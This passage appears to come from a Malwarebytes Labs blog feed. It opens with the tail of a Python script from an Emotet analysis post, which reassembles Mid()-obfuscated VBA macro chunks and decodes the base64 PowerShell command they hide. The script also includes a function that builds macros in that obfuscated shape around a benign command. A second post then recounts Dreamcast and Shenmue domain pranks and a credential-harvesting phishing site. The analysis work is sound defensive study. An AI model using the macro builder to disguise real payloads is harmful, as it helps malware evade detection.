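        raise ValueError("VBA Mid() requires length >= 0")
    chunk = s[start - 1:]
    return chunk if length is None else chunk[:length]


# The one assignment shape that carries data in the analysed function:
#   <var> = <unused> + yy222222222222222y(<literal-var>, <start>, <len>)
CALL_RE = re.compile(
    r"^\s*(\w+)\s*=\s*(?:\w+\s*\+\s*)?yy222222222222222y\((\w+),\s*(\d+),\s*(\d+)\)\s*$"
)
# A plain string literal assignment such as JMArl = "..."
LITERAL_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')


def extract_chunks(vba_lines):
    """Walk the function body, keep literal assignments and Mid-style calls,
    and return the extracted (target, chunk) pairs in source order.  Any other
    line (Sqr/Oct/CLng arithmetic on undefined names) is dead code and ignored."""
    literals, chunks = {}, []
    for line in vba_lines:
        m = LITERAL_RE.match(line)
        if m:
            literals[m.group(1)] = m.group(2)
            continue
        m = CALL_RE.match(line)
        if m:
            target, src, start, length = m.groups()
            chunks.append((target, vba_mid(literals[src], int(start), int(length))))
    return chunks


def reassemble(vba_lines):
    """Concatenate the extracted chunks into the string handed to PowerShell."""
    return "".join(text for _, text in extract_chunks(vba_lines))


def decode_encoded_command(arg):
    """Decode the base64 of UTF-16LE text that -EncodedCommand expects."""
    return base64.b64decode(arg).decode("utf-16-le")


def recover_command(vba_lines):
    return decode_encoded_command(reassemble(vba_lines))


def build_constructed_macro(command, piece_len=6):
    """Construct a macro body in the shape the article describes: each base64
    piece is buried inside a longer literal, a dead arithmetic line is
    interleaved, and a Mid-style call pulls the piece back out.
    (Constructed sample; names and padding are invented.)"""
    encoded = base64.b64encode(command.encode("utf-16-le")).decode()
    pieces = [encoded[i:i + piece_len] for i in range(0, len(encoded), piece_len)]
    lines = []
    for n, piece in enumerate(pieces):
        pad_left, pad_right = "xq" * (n + 1), "zk" * 2
        lines.append(f'lit{n} = "{pad_left}{piece}{pad_right}"')
        lines.append(f"junk{n} = dead{n} = 21790 + 2115454 * nope{n} - CLng(8712932)")
        lines.append(
            f"part{n} = IjKrpJC + yy222222222222222y(lit{n}, {len(pad_left) + 1}, {len(piece)})"
        )
    return lines


# Constructed, benign command used to exercise the full path end to end.
CONSTRUCTED_COMMAND = "Write-Output 'constructed sample'"
CONSTRUCTED_MACRO = build_constructed_macro(CONSTRUCTED_COMMAND)

if __name__ == "__main__":
    print("Mid(JMArl, 14, 11) ->", vba_mid(JMARL, 14, 11))
    print("\n".join(CONSTRUCTED_MACRO))
    print("recovered:", recover_command(CONSTRUCTED_MACRO))
```

Run stand-alone, the script prints the eleven characters Mid() returns for the page’s arguments, the constructed macro body, and the command recovered from it. Lines that match neither regex are dropped without being evaluated, which is the programmatic form of the “discard the useless code” step; the same two shapes are what an analyst would grep for before wiring Debug.Print into the real sample.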

The post Malware analysis: decoding Emotet, part 1 appeared first on Malwarebytes Labs.


Happy anniversary to Dreamcast…and its scams

Thu, 05/24/2018 - 15:00

This month marks 20 years since the legendary SEGA Dreamcast console was first announced. Looked on fondly by gamers, it revolutionised many aspects of gaming and brought cheap(ish) online console gaming to the masses.


SEGA has endured many, many calls for it to come back as Dreamcast 2. The games are widely demanded as retro remakes, and it’s never quite faded from public view. What you might not know is that it’s been the subject of a number of phishing scams/fakeouts down the years. Here are some of my favourites.

Ye olden days

In 2006, when dinosaurs ruled the Earth and televisions were black and white, the Dreamcast had been dead and buried for a few years already. But people still used them, modded them, and still went online with them. See, it came with a modem, and the idea was you went online via SegaNet or DreamArena to play online or just browse the web. You can still go online with them today, with a little bit of additional work.

And now, enter stage left: Shenmue.


Anyone interested in games these days is likely already aware Shenmue 1 and 2 are being remastered, and there’s even a Shenmue 3 on the way to help tie up the dangling story:

Back in the day, it seemed there was no chance of this ever happening despite endless requests, campaigns, fan networks, the lot. While pleas fell seemingly by the wayside, mischievous individuals were all too happy to fill the SEGA shaped vacuum.

Here’s the interesting bit: Shenmue came with a disc called the Shenmue Passport, which was a crude way of popping a web browser via the game and looking at game-related content. It came to pass, one fateful day, while retro gamers were loading up their Passport disc that they saw the following:

Normally it’d say “click to enlarge” under that image, but the screenshot is so old this is the kind of maximum resolution size we have to cope with. (Dinosaurs and black and white televisions, remember?)

It says:


The Shenmue Passport is in update process. Come again and visit us!

Downloads were suddenly available, with the promise of “more to come.” Everyone got excited, and some people even tried uploading their forklift truck racing times (long story).


Imagine their dismay when it turned out that someone had obtained the Shenmue(dot)com domain and decided to play a prank. For a while, the Shenmue domain came back with all the various downloadables that you could no longer obtain through the game, but the addition of the “more to come” messaging made people believe this was the first step of the game returning in new forms. All I can say to that is, “Whoops.”

Some forum threads about this still remain online, and you can see some of the fallout including attempts by SEGA to reclaim the URL.


It reads:

Finally I want to say sorry again to all (like I said sorry in the Shenmue BBS), but now I promise to don’t do something stupid again. And sorry for my bad english (still learning) and my poor Japanese (still learning too). If anyone reach to a SEGA person, tell to him to contact me at [redacted] and I’ll transfer the domain as the people of this forum told me. Sorry again. But don’t loose the hope in Shenmue…

Oh dear.

2007: Shenmue 3 is coming (not)

Would you like a fake Shenmue 3 announcement? Of course you would. That video has now had more than 1 million views (with some 800,000 of those landing at time of launch), and unfortunately, it’s yet another fakeout. Its creator simply took footage from the older games and mashed it up with promotional material from the abandoned Shenmue Online. Here’s the now obligatory thread of angry gamers.

2008: Sign-ups and affiliate codes

You know how someone grabbed the Shenmue domain? Well, lightning struck twice in 2008 when someone did much the same thing with the Dreamcast website. Here’s what it suddenly looked like:


“Do you still own a Dreamcast?”

Well, yes, several. Offering up the promise of a [yourname]ATdreamcast(dot)com email address, it sent the fans wild. Handing the new portal your console serial number(s), username, password, and a current email address would land you a seemingly valid yourserialnumber@user(dot)dreamcast(dot)com address. In practice, this meant the scammer ended up with a large list of emails to target with spam, and also—if people had reused passwords from their actual email for their “Dreamcast” mail—logins. My favourite thing about this was the video game website affiliate code ad hidden in the page:


2009: A grab bag of pranks

If you’re thinking this console has had a lot of scams hung around it, you’d be right. Step forward, the 10th anniversary of said console, filled with yet more shenanigans. These are most of the major Dreamcast-themed antics down the years, but there are lots of others, like the photoshopped Shenmue 3 disc, or the edited “Shenmue 3: Believe” text from a magazine preview, which sent people into a frenzy.

Back to the future present

Now that Shenmue 3 is actually on the way, it’s likely that we’ll see some fresh new scams as the launch draws closer. You just can’t keep a good console—or a smart scam—down. Having said that, you don’t need to go digging around in the depths of retro gaming to find a scam. Your modern games and devices are often more than enough to keep scammers and other cybercriminals busy.

The post Happy anniversary to Dreamcast…and its scams appeared first on Malwarebytes Labs.
